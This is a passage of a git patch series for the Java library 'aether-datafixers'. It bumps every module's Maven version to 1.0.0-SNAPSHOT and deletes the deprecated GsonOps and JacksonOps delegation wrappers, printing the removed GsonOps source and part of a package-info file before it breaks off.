From 10fb6d1018b1a0c7e0fafee1a2ab8c7386e5a5df Mon Sep 17 00:00:00 2001
From: Erik
Date: Sun, 18 Jan 2026 12:34:47 +0100
Subject: [PATCH 01/39] Bump version to `1.0.0-SNAPSHOT` across all modules.
---
aether-datafixers-api/pom.xml | 2 +-
aether-datafixers-bom/pom.xml | 2 +-
aether-datafixers-cli/pom.xml | 2 +-
aether-datafixers-codec/pom.xml | 2 +-
aether-datafixers-core/pom.xml | 2 +-
aether-datafixers-examples/pom.xml | 2 +-
aether-datafixers-functional-tests/pom.xml | 23 +------------------
aether-datafixers-schema-tools/pom.xml | 2 +-
aether-datafixers-spring-boot-starter/pom.xml | 2 +-
aether-datafixers-testkit/pom.xml | 2 +-
pom.xml | 2 +-
11 files changed, 11 insertions(+), 32 deletions(-)
diff --git a/aether-datafixers-api/pom.xml b/aether-datafixers-api/pom.xml
index 1322745..eb56948 100644
--- a/aether-datafixers-api/pom.xml
+++ b/aether-datafixers-api/pom.xml
@@ -6,7 +6,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-api
diff --git a/aether-datafixers-bom/pom.xml b/aether-datafixers-bom/pom.xml
index e736522..e8627a7 100644
--- a/aether-datafixers-bom/pom.xml
+++ b/aether-datafixers-bom/pom.xml
@@ -6,7 +6,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-bom
diff --git a/aether-datafixers-cli/pom.xml b/aether-datafixers-cli/pom.xml
index 2b8a30e..21b802b 100644
--- a/aether-datafixers-cli/pom.xml
+++ b/aether-datafixers-cli/pom.xml
@@ -7,7 +7,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-cli
diff --git a/aether-datafixers-codec/pom.xml b/aether-datafixers-codec/pom.xml
index 5d48923..f0b96d8 100644
--- a/aether-datafixers-codec/pom.xml
+++ b/aether-datafixers-codec/pom.xml
@@ -6,7 +6,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-codec
diff --git a/aether-datafixers-core/pom.xml b/aether-datafixers-core/pom.xml
index e01a286..76d216d 100644
--- a/aether-datafixers-core/pom.xml
+++ b/aether-datafixers-core/pom.xml
@@ -6,7 +6,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-core
diff --git a/aether-datafixers-examples/pom.xml b/aether-datafixers-examples/pom.xml
index aaf7610..1844744 100644
--- a/aether-datafixers-examples/pom.xml
+++ b/aether-datafixers-examples/pom.xml
@@ -7,7 +7,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-examples
diff --git a/aether-datafixers-functional-tests/pom.xml b/aether-datafixers-functional-tests/pom.xml
index 9c0208c..7547f3b 100644
--- a/aether-datafixers-functional-tests/pom.xml
+++ b/aether-datafixers-functional-tests/pom.xml
@@ -1,25 +1,4 @@
-
@@ -28,7 +7,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-functional-tests
diff --git a/aether-datafixers-schema-tools/pom.xml b/aether-datafixers-schema-tools/pom.xml
index bab6ea2..ce4fc1e 100644
--- a/aether-datafixers-schema-tools/pom.xml
+++ b/aether-datafixers-schema-tools/pom.xml
@@ -7,7 +7,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-schema-tools
diff --git a/aether-datafixers-spring-boot-starter/pom.xml b/aether-datafixers-spring-boot-starter/pom.xml
index 4443770..15657e2 100644
--- a/aether-datafixers-spring-boot-starter/pom.xml
+++ b/aether-datafixers-spring-boot-starter/pom.xml
@@ -7,7 +7,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-spring-boot-starter
diff --git a/aether-datafixers-testkit/pom.xml b/aether-datafixers-testkit/pom.xml
index 98f4b67..08c93df 100644
--- a/aether-datafixers-testkit/pom.xml
+++ b/aether-datafixers-testkit/pom.xml
@@ -6,7 +6,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTaether-datafixers-testkit
diff --git a/pom.xml b/pom.xml
index 254ac21..ed31b8e 100644
--- a/pom.xml
+++ b/pom.xml
@@ -6,7 +6,7 @@
de.splatgames.aether.datafixersaether-datafixers
- 0.5.0
+ 1.0.0-SNAPSHOTpomaether-datafixers-api
From aba886d7568f7e6f8e46f6f3fc669f79a3db8c5a Mon Sep 17 00:00:00 2001
From: Erik
Date: Sun, 18 Jan 2026 12:45:53 +0100
Subject: [PATCH 02/39] Remove deprecated `GsonOps` and `JacksonOps` classes.
---
.../aether/datafixers/codec/gson/GsonOps.java | 737 -----------------
.../datafixers/codec/gson/package-info.java | 110 ---
.../datafixers/codec/jackson/JacksonOps.java | 767 ------------------
.../codec/jackson/package-info.java | 135 ---
.../aether/datafixers/testkit/TestData.java | 15 -
5 files changed, 1764 deletions(-)
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/JacksonOps.java
delete mode 100644 aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/jackson/package-info.java
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java
deleted file mode 100644
index 55df6ee..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/GsonOps.java
+++ /dev/null
@@ -1,737 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-package de.splatgames.aether.datafixers.codec.gson;
-
-import com.google.common.base.Preconditions;
-import com.google.gson.JsonArray;
-import com.google.gson.JsonElement;
-import com.google.gson.JsonNull;
-import com.google.gson.JsonObject;
-import com.google.gson.JsonPrimitive;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
-import de.splatgames.aether.datafixers.api.result.DataResult;
-import de.splatgames.aether.datafixers.api.util.Pair;
-import org.jetbrains.annotations.NotNull;
-import org.jspecify.annotations.Nullable;
-
-import java.util.stream.Stream;
-
-/**
- * Backwards-compatibility wrapper for {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}.
- *
- *
This class provides API compatibility for code written against the pre-0.4.0 package structure.
- * It delegates all operations to the new {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * implementation in the reorganized package hierarchy.
This class is scheduled for removal in version 1.0.0. All functionality remains
- * fully operational until removal, but users should migrate to the new package structure
- * at their earliest convenience.
- *
- *
Delegation Pattern
- *
This wrapper implements the delegation pattern, forwarding all method calls to the
- * underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance.
- * This ensures identical behavior between the deprecated and new implementations.
- *
- *
Thread Safety
- *
This class is thread-safe. The singleton {@link #INSTANCE} can be safely shared
- * across multiple threads, as the underlying implementation is also thread-safe.
- *
- * @author Erik Pförtner
- * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
- * @see DynamicOps
- * @since 0.1.0
- * @deprecated Since 0.4.0. Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * from the {@code codec.json.gson} package instead. This class will be removed
- * in version 1.0.0 as part of the package reorganization.
- */
-@Deprecated(forRemoval = true, since = "0.4.0")
-public class GsonOps implements DynamicOps {
-
- /**
- * The singleton instance of the deprecated {@code GsonOps} wrapper.
- *
- *
This instance wraps {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE}
- * and provides full backwards compatibility. It is thread-safe and can be shared across
- * the entire application.
- *
- * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#INSTANCE} instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- public static final GsonOps INSTANCE = new GsonOps(de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE);
-
- /**
- * The underlying {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} instance
- * to which all operations are delegated.
- *
- *
This field holds the actual implementation that performs all DynamicOps operations.
- * The wrapper simply forwards all method calls to this instance, ensuring behavioral
- * equivalence between the deprecated and new implementations.
- */
- private final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps;
-
- /**
- * Creates a new deprecated {@code GsonOps} wrapper delegating to the specified base implementation.
- *
- *
This constructor allows wrapping any {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * instance, though typically the singleton {@link #INSTANCE} should be used instead.
- *
- *
Usage
- *
{@code
- * // Typically use the singleton instead
- * GsonOps ops = GsonOps.INSTANCE;
- *
- * // Or wrap a custom instance if needed
- * GsonOps customOps = new GsonOps(
- * de.splatgames.aether.datafixers.codec.json.gson.GsonOps.INSTANCE
- * );
- * }
- *
- * @param baseOps the base {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
- * instance to delegate all operations to; must not be {@code null}
- * @deprecated Use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} directly instead.
- */
- @Deprecated(forRemoval = true, since = "0.4.0")
- private GsonOps(@NotNull final de.splatgames.aether.datafixers.codec.json.gson.GsonOps baseOps) {
- Preconditions.checkNotNull(baseOps, "baseOps must not be null");
- this.baseOps = baseOps;
- }
-
- // ==================== Empty/Null Values ====================
-
- /**
- * {@inheritDoc}
- *
- *
Returns the canonical empty/null representation for Gson JSON data,
- * which is {@link JsonNull#INSTANCE}. This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#empty()} method.
- *
- * @return {@link JsonNull#INSTANCE} representing the absence of a value
- */
- @NotNull
- @Override
- public JsonElement empty() {
- return this.baseOps.empty();
- }
-
- /**
- * {@inheritDoc}
- *
- *
Returns an empty JSON object ({@code {}}). This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyMap()} method.
Returns an empty JSON array ({@code []}). This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#emptyList()} method.
Checks whether the given JSON element is a map/object structure.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isMap(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonObject}, {@code false} otherwise
- */
- @Override
- public boolean isMap(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isMap(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a list/array structure.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isList(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonArray}, {@code false} otherwise
- */
- @Override
- public boolean isList(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isList(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a string primitive.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isString(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonPrimitive} containing a string,
- * {@code false} otherwise
- */
- @Override
- public boolean isString(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a numeric primitive.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isNumber(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonPrimitive} containing a number,
- * {@code false} otherwise
- */
- @Override
- public boolean isNumber(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isNumber(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether the given JSON element is a boolean primitive.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#isBoolean(JsonElement)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonPrimitive} containing a boolean,
- * {@code false} otherwise
- */
- @Override
- public boolean isBoolean(@NotNull final JsonElement value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.isBoolean(value);
- }
-
- // ==================== Primitive Creation ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON string primitive from the given string value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createString(String)} method.
- *
- * @param value the string value to wrap; must not be {@code null}
- * @return a new {@link JsonPrimitive} containing the string
- */
- @NotNull
- @Override
- public JsonElement createString(@NotNull final String value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createString(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given integer value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createInt(int)} method.
- *
- * @param value the integer value to wrap
- * @return a new {@link JsonPrimitive} containing the integer
- */
- @NotNull
- @Override
- public JsonElement createInt(final int value) {
- return this.baseOps.createInt(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given long value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createLong(long)} method.
- *
- * @param value the long value to wrap
- * @return a new {@link JsonPrimitive} containing the long
- */
- @NotNull
- @Override
- public JsonElement createLong(final long value) {
- return this.baseOps.createLong(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given float value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createFloat(float)} method.
- *
- * @param value the float value to wrap
- * @return a new {@link JsonPrimitive} containing the float
- */
- @NotNull
- @Override
- public JsonElement createFloat(final float value) {
- return this.baseOps.createFloat(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given double value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createDouble(double)} method.
- *
- * @param value the double value to wrap
- * @return a new {@link JsonPrimitive} containing the double
- */
- @NotNull
- @Override
- public JsonElement createDouble(final double value) {
- return this.baseOps.createDouble(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given byte value.
- * Since JSON has no distinct byte type, the value is stored as a number.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createByte(byte)} method.
- *
- * @param value the byte value to wrap
- * @return a new {@link JsonPrimitive} containing the byte as a number
- */
- @NotNull
- @Override
- public JsonElement createByte(final byte value) {
- return this.baseOps.createByte(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given short value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createShort(short)} method.
- *
- * @param value the short value to wrap
- * @return a new {@link JsonPrimitive} containing the short
- */
- @NotNull
- @Override
- public JsonElement createShort(final short value) {
- return this.baseOps.createShort(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON boolean primitive from the given boolean value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createBoolean(boolean)} method.
- *
- * @param value the boolean value to wrap
- * @return a new {@link JsonPrimitive} containing the boolean
- */
- @NotNull
- @Override
- public JsonElement createBoolean(final boolean value) {
- return this.baseOps.createBoolean(value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON numeric primitive from the given {@link Number} value.
- * The specific numeric type is preserved in the underlying JSON representation.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createNumeric(Number)} method.
- *
- * @param value the number value to wrap; must not be {@code null}
- * @return a new {@link JsonPrimitive} containing the number
- */
- @NotNull
- @Override
- public JsonElement createNumeric(@NotNull final Number value) {
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.createNumeric(value);
- }
-
- // ==================== Primitive Reading ====================
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the string value from a JSON element. The element must be a
- * {@link JsonPrimitive} containing a string value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getStringValue(JsonElement)} method.
- *
- * @param input the JSON element to extract the string from; must not be {@code null}
- * @return a {@link DataResult} containing the string value on success,
- * or an error if the element is not a string primitive
- */
- @NotNull
- @Override
- public DataResult getStringValue(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getStringValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the numeric value from a JSON element. The element must be a
- * {@link JsonPrimitive} containing a numeric value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getNumberValue(JsonElement)} method.
- *
- * @param input the JSON element to extract the number from; must not be {@code null}
- * @return a {@link DataResult} containing the {@link Number} value on success,
- * or an error if the element is not a numeric primitive
- */
- @NotNull
- @Override
- public DataResult getNumberValue(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getNumberValue(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the boolean value from a JSON element. The element must be a
- * {@link JsonPrimitive} containing a boolean value.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getBooleanValue(JsonElement)} method.
- *
- * @param input the JSON element to extract the boolean from; must not be {@code null}
- * @return a {@link DataResult} containing the boolean value on success,
- * or an error if the element is not a boolean primitive
- */
- @NotNull
- @Override
- public DataResult getBooleanValue(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getBooleanValue(input);
- }
-
- // ==================== List Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON array from a stream of JSON elements.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createList(Stream)} method.
- *
- * @param values the stream of JSON elements to include in the array; must not be {@code null}
- * @return a new {@link JsonArray} containing all elements from the stream
- */
- @NotNull
- @Override
- public JsonElement createList(@NotNull final Stream values) {
- Preconditions.checkNotNull(values, "values must not be null");
- return this.baseOps.createList(values);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the elements of a JSON array as a stream. The input must be a
- * {@link JsonArray}.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getList(JsonElement)} method.
- *
- * @param input the JSON element to extract list elements from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of the array elements on success,
- * or an error if the input is not a JSON array
- */
- @NotNull
- @Override
- public DataResult> getList(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getList(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON array by appending a value to an existing array.
- * The original array is not modified; a deep copy is created.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToList(JsonElement, JsonElement)} method.
- *
- * @param list the existing JSON array to append to; must not be {@code null}
- * @param value the JSON element to append; must not be {@code null}
- * @return a {@link DataResult} containing the new array with the appended value on success,
- * or an error if the list is not a JSON array
- */
- @NotNull
- @Override
- public DataResult mergeToList(@NotNull final JsonElement list, @NotNull final JsonElement value) {
- Preconditions.checkNotNull(list, "list must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToList(list, value);
- }
-
- // ==================== Map Operations ====================
-
- /**
- * {@inheritDoc}
- *
- *
Retrieves the value associated with a key from a JSON object.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#get(JsonElement, String)} method.
- *
- * @param value the JSON object to retrieve from; must not be {@code null}
- * @param key the key to look up; must not be {@code null}
- * @return the JSON element associated with the key, or {@code null} if not present
- * or if the input is not a JSON object
- */
- @Override
- public @Nullable JsonElement get(@NotNull final JsonElement value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.get(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field set to the specified value.
- * If the input is a JSON object, a deep copy is created with the field updated.
- * If the input is not a JSON object, a new object is created containing only the specified field.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#set(JsonElement, String, JsonElement)} method.
- *
- * @param value the JSON element to modify; must not be {@code null}
- * @param key the key for the field to set; must not be {@code null}
- * @param newValue the value to associate with the key; must not be {@code null}
- * @return a new {@link JsonObject} with the field set to the specified value
- */
- @NotNull
- @Override
- public JsonElement set(@NotNull final JsonElement value, @NotNull final String key, @NotNull final JsonElement newValue) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(newValue, "newValue must not be null");
- return this.baseOps.set(value, key, newValue);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object with a field removed.
- * A deep copy of the input object is created without the specified field.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#remove(JsonElement, String)} method.
- *
- * @param value the JSON object to modify; must not be {@code null}
- * @param key the key of the field to remove; must not be {@code null}
- * @return a new {@link JsonObject} without the specified field
- */
- @NotNull
- @Override
- public JsonElement remove(@NotNull final JsonElement value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.remove(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Checks whether a JSON object contains a field with the specified key.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#has(JsonElement, String)} method.
- *
- * @param value the JSON element to check; must not be {@code null}
- * @param key the key to look for; must not be {@code null}
- * @return {@code true} if the value is a {@link JsonObject} and contains the specified key,
- * {@code false} otherwise
- */
- @Override
- public boolean has(@NotNull final JsonElement value, @NotNull final String key) {
- Preconditions.checkNotNull(value, "value must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- return this.baseOps.has(value, key);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a JSON object from a stream of key-value pairs.
- * Keys must be JSON string primitives; non-string keys are skipped.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#createMap(Stream)} method.
- *
- * @param entries the stream of key-value pairs; must not be {@code null}
- * @return a new {@link JsonObject} containing all valid entries from the stream
- */
- @NotNull
- @Override
- public JsonElement createMap(@NotNull final Stream> entries) {
- Preconditions.checkNotNull(entries, "entries must not be null");
- return this.baseOps.createMap(entries);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Extracts the entries of a JSON object as a stream of key-value pairs.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#getMapEntries(JsonElement)} method.
- *
- * @param input the JSON element to extract entries from; must not be {@code null}
- * @return a {@link DataResult} containing a stream of key-value pairs on success,
- * or an error if the input is not a JSON object
- */
- @NotNull
- @Override
- public DataResult>> getMapEntries(@NotNull final JsonElement input) {
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.getMapEntries(input);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by adding a key-value pair to an existing map.
- * A deep copy of the input map is created with the new entry added.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement, JsonElement)} method.
- *
- * @param map the existing JSON object; must not be {@code null}
- * @param key the key for the new entry (must be a JSON string); must not be {@code null}
- * @param value the value for the new entry; must not be {@code null}
- * @return a {@link DataResult} containing the new object with the added entry on success,
- * or an error if the map is not a JSON object or the key is not a string
- */
- @NotNull
- @Override
- public DataResult mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement key, @NotNull final JsonElement value) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(key, "key must not be null");
- Preconditions.checkNotNull(value, "value must not be null");
- return this.baseOps.mergeToMap(map, key, value);
- }
-
- /**
- * {@inheritDoc}
- *
- *
Creates a new JSON object by merging two maps together.
- * A deep copy of the first map is created, and all entries from the second map are added.
- * Entries in the second map override entries with the same key in the first map.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#mergeToMap(JsonElement, JsonElement)} method.
- *
- * @param map the base JSON object; must not be {@code null}
- * @param other the JSON object to merge from; must not be {@code null}
- * @return a {@link DataResult} containing the merged object on success,
- * or an error if either argument is not a JSON object
- */
- @NotNull
- @Override
- public DataResult mergeToMap(@NotNull final JsonElement map, @NotNull final JsonElement other) {
- Preconditions.checkNotNull(map, "map must not be null");
- Preconditions.checkNotNull(other, "other must not be null");
- return this.baseOps.mergeToMap(map, other);
- }
-
- // ==================== Conversion ====================
-
- /**
- * {@inheritDoc}
- *
- *
Converts data from another {@link DynamicOps} format to Gson's {@link JsonElement}.
- * Recursively converts primitives, lists, and maps to their Gson equivalents.
- * This delegates to the underlying
- * {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps#convertTo(DynamicOps, Object)} method.
- *
- * @param the type parameter of the target format
- * @param ops the target {@link DynamicOps} implementation; must not be {@code null}
- * @param input the data to convert in the source format; must not be {@code null}
- * @return the converted data as a Gson {@link JsonElement}
- */
- @NotNull
- @Override
- public JsonElement convertTo(@NotNull final DynamicOps ops, @NotNull final U input) {
- Preconditions.checkNotNull(ops, "ops must not be null");
- Preconditions.checkNotNull(input, "input must not be null");
- return this.baseOps.convertTo(ops, input);
- }
-
- /**
- * Returns a string representation of this deprecated wrapper.
- *
- *
The returned string clearly indicates that this is a deprecated wrapper
- * class and suggests using the new implementation instead.
- *
- * @return a descriptive string indicating deprecated status and the recommended alternative
- */
- @Override
- public String toString() {
- return "GsonOps (deprecated, use de.splatgames.aether.datafixers.codec.json.gson.GsonOps)";
- }
-}
diff --git a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java b/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java
deleted file mode 100644
index c937d27..0000000
--- a/aether-datafixers-codec/src/main/java/de/splatgames/aether/datafixers/codec/gson/package-info.java
+++ /dev/null
@@ -1,110 +0,0 @@
-/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in all
- * copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- * SOFTWARE.
- */
-
-/**
- * DEPRECATED: Legacy package for Gson-based {@link de.splatgames.aether.datafixers.api.dynamic.DynamicOps}
- * implementation. This package is retained only for backwards compatibility and will be removed in version 1.0.0.
- *
- *
This package contains the original {@link de.splatgames.aether.datafixers.codec.gson.GsonOps} class
- * from the pre-0.4.0 package structure. All classes in this package are deprecated and delegate to their
- * replacements in the reorganized {@link de.splatgames.aether.datafixers.codec.json.gson} package.
- *
- *
Migration Guide
- *
To migrate from this deprecated package to the new package structure:
- *
- *
Import Changes
- *
{@code
- * // Old import (deprecated, will be removed in 1.0.0)
